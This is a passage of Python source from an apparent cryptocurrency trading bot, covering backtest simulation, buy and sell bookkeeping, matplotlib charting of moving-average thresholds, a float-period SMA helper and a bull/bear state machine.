    When the window is exhausted, report results and (optionally) show
    the final plot.
    '''
    #===================================================================
    global storage
    while True:
        # print(info['current_time'], 'current_time')
        # print(info['end'], 'end')
        if info['current_time'] < info['end']:
            # print info['current_time'], time.ctime(info['current_time'])
            # print (data)
            # print (len(data['unix']))
            # print (data)
            # print (info['current_time'])
            data_slice = slice_candles(info['current_time'], data)
            storage['high'] = data_slice['high']
            storage['low'] = data_slice['low']
            storage['open'] = data_slice['open']
            storage['close'] = data_slice['close']
            holdings()
            indicators()
            state_machine()
            trade()
            if LIVE or BACKTEST:
                test_chart()
            # advance the simulated clock by one candle
            info['current_time'] += CANDLE
            info['tick'] += 1
        else:
            # window exhausted: report and finish
            test_stop()
            print_tune()
            if LIVE or BACKTEST:
                test_plot()
                plt.pause(0.0001)
            if BACKTEST:
                plt.ioff()
                try:
                    plot_format()
                except:
                    pass
                plt.show()
            break
def test_buy(price):  # Execute a backtest buy
    """Convert the entire currency balance to assets at *price*,
    record the trade, and (when charting) print and plot the buy."""
    storage['trades'] += 1
    when = info['current_time']
    stamp = time.ctime(when)
    storage['buys'][0].append(when)
    storage['buys'][1].append(price)
    portfolio['assets'] = portfolio['currency'] / price
    if LIVE or BACKTEST:
        plot_text()
        call = ('BULL SUPPORT' if storage['market_cross'] is True
                else 'BEAR DESPAIR')
        print(('[%s] %s BUY %s %.2f %s at %s sat value %.2f %s' %
               (stamp, storage['trades'], call,
                portfolio['assets'], ASSET,
                int(price * ANTISAT), portfolio['currency'], CURRENCY)))
        plt.plot(when, (price), markersize=10,
                 marker='^', color='lime', label='buy')
    portfolio['currency'] = 0
    if LIVE:
        plt.pause(0.0001)
def test_sell(price):  # Execute a backtest sell
    """Convert the entire asset balance to currency at *price*, record
    the trade, and (when charting) print, plot the sell, and draw a
    win/loss line back to the most recent buy."""
    storage['trades'] += 1
    now = info['current_time']
    storage['sells'][0].append(info['current_time'])
    storage['sells'][1].append(price)
    portfolio['currency'] = portfolio['assets'] * price
    if LIVE or BACKTEST:
        plot_text()
        plt.plot(info['current_time'], (price), markersize=10,
                 marker='v', color='coral', label='sell')
        if storage['market_cross'] is True:
            call = 'BULL OVERBOUGHT'
        else:
            call = 'BEAR RESISTANCE'
        # BUGFIX: test that a buy exists; the old `buys[1][-1]` raised
        # IndexError when a sell preceded the first buy (and was falsy
        # for a zero buy price)
        if storage['buys'][1]:
            buy_price = storage['buys'][1][-1]
            buy_time = storage['buys'][0][-1]
            # green line for a winning round trip, coral for a loss
            if price > buy_price:
                plt.plot((buy_time, now), (buy_price, price),
                         color='lime', label='win', lw=2)
            else:
                plt.plot((buy_time, now), (buy_price, price),
                         color='coral', label='loss', lw=2)
        print(('[%s] %s SELL %s %.2f %s at %s sat value %.2f %s' %
               (time.ctime(now), storage['trades'], call,
                portfolio['assets'], ASSET,
                int(price * ANTISAT), portfolio['currency'], CURRENCY)))
    portfolio['assets'] = 0
    if LIVE:
        plt.pause(0.0001)
# PLOT, PRINT, ALARM
def draw_state_machine(  # Plots primary trade indications
        now, selloff, support, resistance, despair,
        buying, selling, min_cross, max_cross,
        market_cross, ma2):
    """Draw the state-machine bands, the white cross band, and the
    threshold markers for one time column; skipped entirely in SALES
    mode."""
    if not SALES:
        # vertical bands: green-on-top in a bull market, red in a bear
        if market_cross:
            bands = (((selloff, support), 'lime'),
                     ((resistance, despair), 'darkorchid'))
        else:
            bands = (((resistance, despair), 'red'),
                     ((selloff, support), 'darkorchid'))
        for (top, bottom), shade in bands:
            plt.plot((now, now), (top, bottom),
                     color=shade, label='state', alpha=0.2)
        plt.plot((now, now), ((max_cross), (min_cross)),
                 color='white', label='cross', alpha=1.0)
        # dot markers: (level, size, color, label), in original order
        markers = ((ma2, 6, 'aqua', 'ma2'),
                   (max_cross, 3, 'white', 'cross'),
                   (min_cross, 3, 'white', 'cross'),
                   (selloff, 3, 'darkorchid', 'selloff'),
                   (despair, 3, 'darkorchid', 'despair'),
                   (resistance, 3, 'darkorchid', 'resistance'),
                   (support, 3, 'darkorchid', 'support'),
                   (buying, 6, 'lime', 'buying'),
                   (selling, 6, 'red', 'selling'))
        for level, size, shade, tag in markers:
            plt.plot(now, level, markersize=size, marker='.',
                     color=shade, label=tag)
def test_rechart_orders():  # Set buy/sell markers on top
    """Re-draw every recorded buy/sell marker so they sit above lines
    plotted later, then re-draw the star and refresh."""
    # iterate (time, price) pairs directly instead of range(len(...))
    for when, price in zip(storage['sells'][0], storage['sells'][1]):
        plt.plot(when, (price),
                 markersize=10, marker='v', color='coral', label='sell')
    for when, price in zip(storage['buys'][0], storage['buys'][1]):
        plt.plot(when, (price),
                 markersize=10, marker='^', color='lime', label='buy')
    chart_star()
    plt.pause(0.001)
def live_chart_latest():  # Plot last 24hrs of 5m candles
    """Seed the live chart with the last day of 5-minute candles:
    magenta wick dots where they extend past the close, yellow closes."""
    now = int(time.time())
    days = 1
    candle = 300
    d = backtest_candles(PAIR, (now - days * 86400), now, candle)
    # iterate candle tuples directly instead of range(len(...))
    for when, hi, lo, cl in zip(d['unix'], d['high'], d['low'], d['close']):
        if lo < cl:
            plt.plot(when, lo, markersize=6, marker='.',
                     color='m', label='low')
        if hi > cl:
            plt.plot(when, hi, markersize=6, marker='.',
                     color='m', label='high')
        plt.plot(when, cl, markersize=2, marker='.',
                 color='y', label='close')
    plt.pause(0.001)
def test_chart_latest():  # Plot high resolution end of backtest
    """Overlay the end of the backtest with finer data: one day of 5m
    candles plus thirty days of 2h candles."""

    def overlay(days, candle):
        # fetch and draw one candle series ending at info['end']
        d = backtest_candles(
            PAIR, (info['end'] - days * 86400), info['end'], candle)
        for when, hi, lo, cl in zip(
                d['unix'], d['high'], d['low'], d['close']):
            # NOTE(review): the high marker is gated on the *low* wick
            # and vice versa, exactly as in the original code (and
            # opposite to live_chart_latest) — confirm intent
            if lo < cl:
                plt.plot((when), (hi), markersize=4, marker='.',
                         color='m', label='high')
            if hi > cl:
                plt.plot((when), (lo), markersize=4, marker='.',
                         color='m', label='low')
            plt.plot((when), (cl), markersize=4, marker='.',
                     color='y', label='close')

    overlay(days=1, candle=300)    # plot 1 day of 5m candles
    overlay(days=30, candle=7200)  # plot last 30 days of 2h
    plt.pause(0.001)
def test_chart():  # Add objects to backtest plot
    """Append this tick's state-machine bands and candle to the plot;
    draw the opening star on the first tick."""
    now = info['current_time']
    ma1, ma2 = storage['ma1'][-1], storage['ma2'][-1]
    close, high, low = storage['close'], storage['high'], storage['low']
    draw_state_machine(now,
                       storage['selloff'], storage['support'],
                       storage['resistance'], storage['despair'],
                       storage['buying'], storage['selling'],
                       storage['min_cross'], storage['max_cross'],
                       storage['market_cross'], ma2)
    # candle: vertical magenta wick from high to low, yellow close dot
    plt.plot((now, now), ((high[-1]), (low[-1])),
             color='m', label='high_low', alpha=0.5)
    plt.plot(now, (close[-1]), markersize=4, marker='.',
             color='y', label='close')
    if info['tick'] == 0:
        chart_star()
def live_chart():  # Add objects to live plot
    """Draw this tick's state machine, order book edges, rates and
    scalp levels; on the first tick also back-fill ~19 two-hour candles
    of state-machine history so the chart starts populated."""
    cex_rate = storage['cex_rate']
    dex_rate = storage['dex_rate']
    m_volume = storage['m_volume']
    ma1 = storage['ma1'][-1]
    ma2 = storage['ma2'][-1]
    ma3 = storage['ma3'][-1]
    ma4 = storage['ma4'][-1]
    selloff = storage['selloff']
    despair = storage['despair']
    resistance = storage['resistance']
    support = storage['support']
    buying = storage['buying']
    selling = storage['selling']
    ask = book['askp'][0]
    bid = book['bidp'][0]
    scalp_resistance = storage['scalp_resistance']
    scalp_support = storage['scalp_support']
    max_cross = storage['max_cross']
    min_cross = storage['min_cross']
    market_cross = storage['market_cross']
    now = info['current_time']
    high = storage['high']
    low = storage['low']
    # plot state machine
    draw_state_machine(now, selloff, support,
                       resistance, despair, buying, selling,
                       min_cross, max_cross, market_cross, ma2)
    plt.plot(now, high,
             markersize=3, marker='.', color='m', label='high')
    plt.plot(now, low,
             markersize=3, marker='.', color='m', label='low')
    plt.plot(now, scalp_resistance, markersize=4, marker='.',
             color='tomato', label='scalp_resistance')
    plt.plot(now, scalp_support, markersize=4, marker='.',
             color='palegreen', label='scalp_support')
    plt.plot(now, ask, markersize=3, marker='.',
             color='aqua', label='ask')
    plt.plot(now, bid, markersize=3, marker='.',
             color='aqua', label='bid')
    # rate dots scale with market volume
    plt.plot(now, dex_rate, markersize=4 * m_volume, marker='.',
             color='khaki', label='dex_rate')
    plt.plot(now, cex_rate, markersize=4 * m_volume, marker='.',
             color='yellow', label='cex_rate')
    if info['tick'] == 0:
        # clone the backtest in higher resolution for last 24hrs
        plt.plot((now, now), (selloff, despair),
                 color='white', label='vertical start', lw=5, alpha=0.2)
        ma1_period = MA1 * 86400 / 7200.0
        ma2_period = MA2 * 86400 / 7200.0
        ma1_arr = float_sma(data['7200']['close'], ma1_period)
        ma2_arr = float_sma(data['7200']['close'], ma2_period)
        unix = data['7200']['unix']
        # walk backwards through the last ~19 2h candles, stamping a
        # 5-minute column for each
        for i in range(-1, -20, -1):
            for z in range(0, 7200, 300):
                try:
                    now = unix[i] + z
                    ma1 = ma1_arr[i]
                    ma2 = ma2_arr[i]
                    # state machine clone
                    min_cross = MIN_CROSS * ma1
                    max_cross = MAX_CROSS * min_cross
                    bull_stop = BULL_STOP * ma2
                    bear_stop = BEAR_STOP * ma2
                    selloff = SELLOFF * ma1
                    despair = DESPAIR * ma1
                    support = max((SUPPORT * ma1), bull_stop)
                    resistance = min((RESISTANCE * ma1), bear_stop)
                    if market_cross:
                        selling = selloff
                        buying = support
                    else:
                        buying = despair
                        selling = resistance
                    # plot state machine
                    draw_state_machine(now, selloff, support,
                                       resistance, despair, buying, selling,
                                       min_cross, max_cross, market_cross, ma2)
                except:
                    print ('plot ma_arr failed')
                    pass
        chart_star()
    plt.pause(0.001)
def chart_star():  # Plot a star at begin and end of backtest
    """Mark the current rate with a layered white/yellow star glyph."""
    now = info['current_time']
    rate = storage['cex_rate'] if info['live'] else (storage['close'][-1])
    # layered tri-marker glyphs ('1'-'4') plus a center dot make the star
    for size, mark, shade in ((50, '1', 'w'), (40, '2', 'y'),
                              (40, '3', 'w'), (50, '4', 'y'),
                              (15, '.', 'y')):
        plt.plot(now, rate, markersize=size,
                 marker=mark, color=shade, label='cex_rate')
def plot_format():  # Set plot colors and attributes
    """Style the current axes: dark theme, right-hand y axis, grids,
    tick spacing, timestamp x labels, and (backtest only) a log y scale
    with custom sub-ticks.  Re-run after each batch of plotting calls."""
    warnings.filterwarnings("ignore", category=cbook.mplDeprecation)
    ax = plt.gca()
    ax.patch.set_facecolor('0.1')
    ax.yaxis.tick_right()
    ax.spines['bottom'].set_color('0.5')
    ax.spines['top'].set_color(None)
    ax.spines['right'].set_color('0.5')
    ax.spines['left'].set_color(None)
    ax.tick_params(axis='x', colors='0.7', which='both')
    ax.tick_params(axis='y', colors='0.7', which='both')
    ax.yaxis.label.set_color('0.9')
    ax.xaxis.label.set_color('0.9')
    # BUGFIX: was `plt.minorticks_on` without parentheses — a bare
    # attribute access that silently never enabled minor ticks
    plt.minorticks_on()
    plt.grid(b=True, which='major', color='0.2', linestyle='-')
    plt.grid(b=True, which='minor', color='0.2', linestyle='-')
    if (info['live'] is False) and (info['tick'] > 1):
        plt.ylabel('LOGARITHMIC PRICE SCALE')
        plt.yscale('log')
    if info['live'] is True:
        plt.ylabel('MARKET PRICE')
    ax.yaxis.set_major_formatter(matplotlib.ticker.ScalarFormatter())
    ax.yaxis.set_minor_formatter(matplotlib.ticker.ScalarFormatter())
    ax.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter("%.8f"))
    ax.yaxis.set_minor_formatter(matplotlib.ticker.FormatStrFormatter("%.8f"))
    # x tick spacing: hourly when live, else scaled to backtest length
    if info['live']:
        stepsize = 3600
    else:
        if DAYS > 100:
            stepsize = 2592000
        elif DAYS > 20:
            stepsize = 864000
        else:
            stepsize = 86400
    start, end = ax.get_xlim()
    ax.xaxis.set_ticks(np.arange((end - end % 3600), start, -stepsize))

    def timestamp(x, pos):
        # x axis labels: date only in backtest, date+time when live
        if not info['live']:
            return (datetime.fromtimestamp(x)).strftime('%Y-%m-%d')
        else:
            return (datetime.fromtimestamp(x)).strftime('%m/%d %H:%M')
    ax.xaxis.set_major_formatter(matplotlib.ticker.FuncFormatter(timestamp))
    if info['tick'] > 1:
        # force 'autoscale'
        yd = []  # matrix of y values from all lines on plot
        xd = []  # matrix of x values from all lines on plot
        for line in plt.gca().get_lines():
            yd.append((line.get_ydata()).tolist())
            xd.append((line.get_xdata()).tolist())
        yd = [item for sublist in yd for item in sublist]
        ymin, ymax = np.min(yd), np.max(yd)
        ax.set_ylim([0.95 * ymin, 1.05 * ymax])
        xd = [item for sublist in xd for item in sublist]
        xmin, xmax = np.min(xd), np.max(xd)
        ax.set_xlim([xmin, xmax])
        if (info['live'] is False):
            # add sub minor ticks at 'nice' mantissas across 16 decades
            set_sub_formatter = []
            sub_ticks = [10, 11, 12, 14, 16, 18, 22, 25, 35, 45]
            sub_range = [-8, 8]
            for i in sub_ticks:
                for j in range(sub_range[0], sub_range[1]):
                    set_sub_formatter.append(i * 10 ** j)
            # keep only the ticks inside the current y window
            in_window = [v for v in set_sub_formatter if ymin < v < ymax]
            ax.set_yticks(in_window)
    if info['live']:
        start, end = ax.get_ylim()
        stepsize = abs(start - end) / 25
        ax.yaxis.set_ticks(np.arange(end, start, -stepsize))
    plt.gcf().autofmt_xdate(rotation=30)
    ax.title.set_color('darkorchid')
    plt.title(('%s ' % PAIR) + VERSION)
    plt.tight_layout()
def plot_text():  # Display market condition on plot
    """Refresh the text overlays: static branding plus the dynamic
    bull/bear market condition calls.

    Artists from the previous refresh are removed and a fresh list is
    kept in storage['text'] so they can be removed next time.
    """
    # clear text from the previous refresh
    for text in storage.get('text', []):
        try:
            text.remove()
        except:
            pass
    # BUGFIX: rebuild the list instead of appending forever — the old
    # code kept every dead artist and re-removed them on each refresh,
    # so the list (and the removal loop) grew without bound
    storage['text'] = []
    # static text
    textx = 0.1 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
    texty = 0.8 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
    storage['text'].append(plt.text(textx, texty,
                                    'litepresence', color='aqua',
                                    alpha=0.2, size=70))
    textx = 0.27 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
    texty = 0.7 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
    storage['text'].append(plt.text(textx, texty,
                                    'EXTINCTION EVENT', color='aqua',
                                    alpha=0.3, size=25, weight='extra bold'))
    textx = 0.1 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
    texty = 0.08 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
    storage['text'].append(
        plt.text(textx, texty, '(BTS) litepresence1',
                 color='white', alpha=0.5, size=10, weight='extra bold'))
    textx = 0.4 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
    texty = 0.1 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
    storage['text'].append(
        plt.text(textx, texty, (ASSET + CURRENCY),
                 color='yellow', alpha=0.1, size=70, weight='extra bold'))
    textx = 0.6 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
    texty = 0.05 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
    text = 'BACKTEST '
    if info['live']:
        text = 'LIVE '
    text += storage['asset_name']
    storage['text'].append(
        plt.text(textx, texty, text,
                 color='yellow', alpha=0.25, size=20, weight='extra bold'))
    # dynamic text
    # live mode has no candle, so the current rate stands in for both
    if info['live']:
        high = storage['cex_rate']
        low = storage['cex_rate']
    else:
        high = storage['high'][-1]
        low = storage['low'][-1]
    textx = 0.1 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
    texty = 0.1 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
    if storage['market_cross']:
        storage['text'].append(
            plt.text(textx, texty, 'BULL MARKET',
                     color='lime', alpha=0.3, size=30, weight='extra bold'))
        textx = 0.125 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
        texty = 0.05 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
        if low < storage['buying']:
            storage['text'].append(
                plt.text(textx, texty, 'BUY SUPPORT',
                         color='lime', alpha=0.5, size=20,
                         weight='extra bold'))
        elif high > storage['selling']:
            storage['text'].append(
                plt.text(textx, texty, 'SELL OVERBOUGHT',
                         color='red', alpha=0.5, size=20,
                         weight='extra bold'))
    else:
        storage['text'].append(
            plt.text(textx, texty, 'BEAR MARKET',
                     color='red', alpha=0.3, size=30, weight='extra bold'))
        textx = 0.125 * (plt.xlim()[1] - plt.xlim()[0]) + plt.xlim()[0]
        texty = 0.05 * (plt.ylim()[1] - plt.ylim()[0]) + plt.ylim()[0]
        if low < storage['buying']:
            storage['text'].append(
                plt.text(textx, texty, 'BUY DESPAIR',
                         color='lime', alpha=0.5, size=20,
                         weight='extra bold'))
        elif high > storage['selling']:
            storage['text'].append(
                plt.text(textx, texty, 'SELL RESISTANCE',
                         color='red', alpha=0.5, size=20,
                         weight='extra bold'))
    plt.tight_layout()
def test_plot():  # Display backtest plot
    """Animate the backtest plot by progressively narrowing the x window.

    Repeatedly re-windows the current axes from ``begin`` to ``end`` (with a
    50-unit margin), pruning line data that has scrolled out of view, until
    the window is no wider than LIVE_PLOT_DEPTH.  Then draws the static
    text/format overlays and, for backtests, autoscales the y axis.

    Reads the module-level ``info`` dict and the LIVE / BACKTEST /
    LIVE_PLOT_DEPTH constants; calls plot_text() and plot_format().
    """
    begin = info['begin']
    end = info['end']
    while (end - begin) > LIVE_PLOT_DEPTH:
        # PLOT FORMAT
        try:
            ax = plt.gca()
            # Window the plot with a 50-unit margin on each side
            ax.set_xlim(left=begin - 50, right=end + 50)
            # Prevent memory leak: remove line data left of the window
            for line in ax.get_lines():
                if line.get_xdata()[0] < begin:
                    line.remove()
            plt.tight_layout()
            plt.pause(0.0001)
        except Exception:  # was a bare except; keep Ctrl-C working
            print('animated test plot failed')
        # Advance the window OUTSIDE the try block: previously a failing
        # draw skipped this update and spun the while loop forever.
        if LIVE:
            begin = begin + 0.3 * (end - begin)
        else:
            begin = end
    plot_text()
    plot_format()
    # if LIVE: plt.clf() # clear the plotted figure; end log scale
    if BACKTEST:
        try:
            plt.autoscale(enable=True, axis='y')
            plt.pause(0.0001)
        except Exception:
            print('static test plot failed')
def live_plot():  # Display live plot
    """Re-window the live plot to the trailing LIVE_PLOT_DEPTH seconds.

    Clamps the x axis to [now - LIVE_PLOT_DEPTH, now], removes any line
    whose first data point has scrolled left of the window (prevents
    unbounded memory growth), redraws the text overlays and flushes the
    GUI event loop with a short pause.
    """
    now = int(time.time())
    ax = plt.gca()
    # Window Plot
    ax.set_xlim(([(now - LIVE_PLOT_DEPTH), (now)]))
    # Prevent Memory Leak Outside Plot Window; remove unnecessary data
    for l in ax.get_lines():
        xval = l.get_xdata()[0]
        if (xval < (ax.get_xlim()[0])):
            l.remove()
    plot_text()
    plt.tight_layout()
    plt.pause(0.0001)
def test_stop():  # Display results of backtest session
    """Finalize a backtest: optionally exit to currency, store ROI/APY
    statistics in ``storage``, and print a formatted session summary.

    Reads the module-level ``storage``, ``portfolio``, ``info`` and ``data``
    dicts plus various tuning constants; mutates ``storage`` in place and
    finishes by re-charting the executed orders.
    """
    close = storage['close'][-1]
    # ctime_tick_labels()
    # move to currency
    if BACKTEST and (portfolio['assets'] > 0.1) and CURRENCY_STOP:
        print('stop() EXIT TO CURRENCY')
        test_sell(price=close)
    # calculate return on investment
    end_max_assets = portfolio['assets'] + (portfolio['currency'] / close)
    end_max_currency = portfolio['currency'] + (portfolio['assets'] * close)
    roi_assets = end_max_assets / storage['begin_max_assets']
    roi_currency = end_max_currency / storage['begin_max_currency']
    storage['roi_currency'] = roi_currency
    days = (info['end'] - info['begin']) / 86400.0
    # SATOSHI offset presumably guards against division by zero when there
    # were no trades -- TODO confirm
    frequency = (SATOSHI + storage['trades']) / days
    storage['dpt'] = 1.0 / frequency
    # Compound-interest solve for the annual rate: A = P*(1+(r/n))**(n*t)
    P = storage['begin_max_currency']
    t = DAYS / 365.0
    A = end_max_currency
    n = 1.0
    r = n * ((A / P) ** (1 / (n * t)) - 1)
    storage['apy_currency'] = r
    if LIVE or BACKTEST:
        print(
            '===============================================================')
        print(('START DATE........: %s' % time.ctime(info['begin'])))
        print(('END DATE..........: %s' % time.ctime(info['end'])))
        print(('DAYS..............: %.1f' % days))
        print(('TRADES............: %s' % storage['trades']))
        print(('DAYS PER TRADE....: %.1f' % storage['dpt']))
        print(('START PRICE.......: %.8f ' % data['close'][-DAYS]))
        print(('END PRICE.........: %.8f' % close))
        print(('START PORTFOLIO...: %.1f %s %.1f %s' %
               (START_CURRENCY, CURRENCY, START_ASSETS, ASSET)))
        print(
            ('START MAX ASSETS..: %s %s' %
             (storage['begin_max_assets'], ASSET)))
        print(('END MAX ASSETS....: %s %s' % (end_max_assets, ASSET)))
        print(('ROI ASSETS........: %.2fX' % roi_assets))
        print(('START MAX CURRENCY: %s %s' %
               (storage['begin_max_currency'], CURRENCY)))
        print(('END MAX CURRENCY..: %s %s' % (end_max_currency, CURRENCY)))
        print(('ROI CURRENCY......: %.2fX' % roi_currency))
        # print(('APY CURRENCY......: %.2f' % storage['apy_currency']))
        print(
            '===============================================================')
        print(VERSION)
        print('~===END BACKTEST=========================~')
    test_rechart_orders()
def print_tune():  # Display input thresholds
    """Print the current tuning constants and backtest statistics.

    Falls back to the ROI/APY/DPT defaults when no backtest has populated
    ``storage`` yet.  In OPTIMIZE mode the separator renders as '+=' so the
    output can be pasted back as incremental tuning deltas.
    """
    storage['roi_currency'] = storage.get('roi_currency', ROI)
    storage['apy_currency'] = storage.get('apy_currency', APY)
    storage['dpt'] = storage.get('dpt', DPT)
    storage['trades'] = storage.get('trades', 0)
    # NOTE(review): `frequency` is computed but never used below
    frequency = (SATOSHI + storage['trades']) / DAYS
    z = '+=' if OPTIMIZE else '='
    print('#######################################')
    print(('CURRENCY = "%s"' % CURRENCY))
    print(('ASSET = "%s"' % ASSET))
    print(('MA1 %s %.2f' % (z, MA1)))
    print(('MA2 %s %.2f' % (z, MA2)))
    print(('SELLOFF %s %.3f' % (z, SELLOFF)))
    print(('SUPPORT %s %.3f' % (z, SUPPORT)))
    print(('RESISTANCE %s %.3f' % (z, RESISTANCE)))
    print(('DESPAIR %s %.3f' % (z, DESPAIR)))
    print(('MIN_CROSS %s %.3f' % (z, MIN_CROSS)))
    print(('MAX_CROSS %s %.3f' % (z, MAX_CROSS)))
    print(('BULL_STOP %s %.3f' % (z, BULL_STOP)))
    print(('BEAR_STOP %s %.3f' % (z, BEAR_STOP)))
    print('#######################################')
    # print(('# RESOLUTION : %s' % RESOLUTION))
    print(('# DAYS : %s' % DAYS))
    print(('DPT = %.1f' % storage['dpt']))
    print(('# MARKET CAP....: %.1fM' % asset_cap))
    print(('# DOMINANCE.....: %.4f - RANK %s' % (asset_dominance, asset_rank)))
    print(('ROI = %.2fX' % storage['roi_currency']))
    # print(('APY = %.2f' % storage['apy_currency']))
    print('#######################################')
def bell(duration, frequency):  # Activate linux audible bell
    """Sound a sine tone of *duration* seconds at *frequency* Hz.

    Shells out to the sox ``play`` utility; a no-op failure if sox is
    not installed (os.system return value is ignored).
    """
    command = ('play --no-show-progress --null --channels 1 synth' +
               ' %s sine %f' % (duration, frequency))
    os.system(command)
# DATA PROCESSING
def clock():  # 24 hour clock formatted HH:MM:SS
    """Return the current local time as a zero-padded ``HH:MM:SS`` string."""
    return time.strftime('%H:%M:%S')
def satoshi(n):  # format prices to satoshi type
    """Round *n* (number or numeric string) to 8 decimal places as a float."""
    return float(format(float(n), '.8f'))
def dictionaries():  # Global info, data, portfolio, and storage
    """(Re)initialize the shared module-level state dicts to empty."""
    global info, storage, portfolio, book
    info, book, storage, portfolio = {}, {}, {}, {}
def coin_name():  # Convert ticker symbols to coin names
    """Resolve the ASSET and CURRENCY tickers to full coin names.

    Looks both tickers up via ``currencies()``, stores the names in the
    module-level ``storage`` dict and echoes the asset name.
    """
    lookup = currencies()
    storage['asset_name'] = lookup[ASSET]['CoinName']
    storage['currency_name'] = lookup[CURRENCY]['CoinName']
    print((storage['asset_name']))
def ctime_tick_labels():  # X axis timestamps formatting
    """Replace numeric x-axis tick labels with human-readable ctime stamps.

    Forces a canvas draw so tick label text exists, then converts every
    label that parses as a float (an epoch timestamp) to ``time.ctime``
    form, leaving non-numeric labels untouched.  Operates on the current
    axes of the module-level ``fig``.
    """
    ax = plt.gca()
    fig.canvas.draw()  # tick labels are empty until the canvas is drawn
    xlabels = []
    for label in ax.get_xticklabels():
        text = label.get_text()
        try:
            # epoch seconds -> 'Day Mon DD HH:MM:SS YYYY'
            xlabels.append(time.ctime(float(text)))
        except (ValueError, OverflowError, OSError):
            # not a timestamp (or out of ctime range): keep as plain text
            xlabels.append(str(text))
    ax.set_xticklabels(xlabels)
def indicators():  # Post process data
    """Compute moving averages, highs/lows, order book and ratios.

    Backtest mode derives the two alpha SMAs from ``storage['close']``.
    Live mode derives them from the 2-hour candle feed and additionally
    computes scalp SMAs, a 20-minute high/low, a fresh order-book snapshot,
    buying-power ratios and a clamped volume ratio for plotting.
    Mutates the module-level ``storage`` and ``book`` dicts.
    """
    global storage
    global book
    # SMA windows expressed in candles (MA1/MA2 are given in days)
    ma1_period = MA1 * 86400.0 / CANDLE
    ma2_period = MA2 * 86400.0 / CANDLE
    if not info['live']:
        # alpha moving averages
        storage['ma1'] = float_sma(storage['close'], ma1_period)
        storage['ma2'] = float_sma(storage['close'], ma2_period)
    if info['live']:
        # alpha moving averages
        storage['ma1'] = float_sma(
            data['7200']['close'], ma1_period)
        storage['ma2'] = float_sma(
            data['7200']['close'], ma2_period)
        # scalp moving averages (288 five-minute candles per day)
        storage['ma3'] = float_sma(data['300']['close'], 288 * MA3)
        storage['ma4'] = float_sma(data['300']['close'], 288 * MA4)
        # 20 minute high and low (last four 5-minute candles)
        storage['high'] = max(data['300']['high'][-4:])
        storage['low'] = min(data['300']['low'][-4:])
        # orderbook and last price
        book = dex('book')
        sbids = [('%.8f' % i) for i in book['bidp'][:3]]
        sbids = sbids[::-1]
        sasks = [('%.8f' % i) for i in book['askp'][:3]]
        print (sbids, 'BIDS <> ASKS', sasks)
        cex_rate = storage['cex_rate']
        # means to buy and percent invested
        assets = portfolio['assets']
        currency = portfolio['currency']
        # SATOSHI presumably keeps the numerator non-zero -- TODO confirm
        means = storage['means'] = (currency + SATOSHI) / cex_rate
        storage['asset_ratio'] = assets / (assets + means)
        # recent volume ratio for plotting
        depth = 100
        mv = ((depth * data['300']['volume'][-1]) /
              sum(data['300']['volume'][-depth:]))
        # clamp to [1, 5] for marker sizing
        storage['m_volume'] = 1 if mv < 1 else 5 if mv > 5 else mv
def float_sma(array, period):  # floating point periods accepted
    """Simple moving average that accepts a non-integer window length.

    An integer *period* yields a plain cumulative-sum SMA.  A fractional
    period yields the length-aligned linear blend of the SMAs at
    floor(period) and ceil(period), weighted by proximity to each.
    Returns a numpy array containing only the fully-valid windows
    (shorter than the input).
    """
    def _sma(values, window):  # integer-window SMA via cumulative sums
        csum = np.cumsum(values, dtype=float)
        csum[window:] = csum[window:] - csum[:-window]
        return csum[window - 1:] / window

    whole = int(period)
    if period == whole:
        return _sma(array, whole)
    # Blend the two nearest integer-period SMAs, trimmed to equal length.
    upper = whole + 1
    w_lower = upper - period       # weight toward floor(period)
    w_upper = 1.0 - w_lower        # weight toward ceil(period)
    lower_ma = _sma(array, whole)
    upper_ma = _sma(array, upper)
    size = min(len(lower_ma), len(upper_ma))
    return (w_lower * lower_ma[-size:]) + (w_upper * upper_ma[-size:])
# ARTIFICIAL INTELLEGENCE
def state_machine():  # Alpha and beta market finite state
    """Update the bull/bear (alpha) state and the buy/sell (beta) thresholds.

    Alpha: ``storage['market_cross']`` flips bullish when MIN_CROSS*ma1
    exceeds ma2, and bearish when max_cross falls below ma2; in live mode
    FORCE_ALPHA can override the result.  Beta: the active buying/selling
    trigger prices are chosen from selloff/support/resistance/despair
    according to the alpha state.  On backtest tick 0 the starting position
    is entered per the MARKET_CROSS constant.  Mutates ``storage``.
    """
    # localize primary indicators
    ma1 = storage['ma1'][-1]
    ma2 = storage['ma2'][-1]
    min_cross = storage['min_cross'] = MIN_CROSS * ma1
    max_cross = storage['max_cross'] = MAX_CROSS * storage['min_cross']
    # set alpha state
    storage['market_cross'] = storage.get('market_cross', MARKET_CROSS)
    if storage['market_cross'] is False:
        if (min_cross > ma2):
            storage['market_cross'] = True
    if storage['market_cross'] is True:
        if (max_cross < ma2):
            storage['market_cross'] = False
    # Manual override alpha state
    if info['live']:
        if FORCE_ALPHA == 'BULL':
            storage['market_cross'] = True
        if FORCE_ALPHA == 'BEAR':
            storage['market_cross'] = False
    # establish beta thresholds
    storage['selloff'] = (ma1 * SELLOFF)
    storage['support'] = max(ma1 * SUPPORT, ma2 * BULL_STOP)
    storage['resistance'] = min(ma1 * RESISTANCE, ma2 * BEAR_STOP)
    storage['despair'] = (ma1 * DESPAIR)
    # initialize backtest per MARKET_CROSS
    if (info['live'] is False) and (info['tick'] == 0):
        close = storage['close'][-1]
        storage['selling'] = storage['buying'] = close
        if MARKET_CROSS is True:
            if START_CURRENCY > 0:
                test_buy(close)
        if MARKET_CROSS is False:
            if START_ASSETS > 0:
                test_sell(close)
    # set beta state
    if storage['market_cross']:
        storage['buying'] = storage['support']
        storage['selling'] = storage['selloff']
    else:
        storage['buying'] = storage['despair']
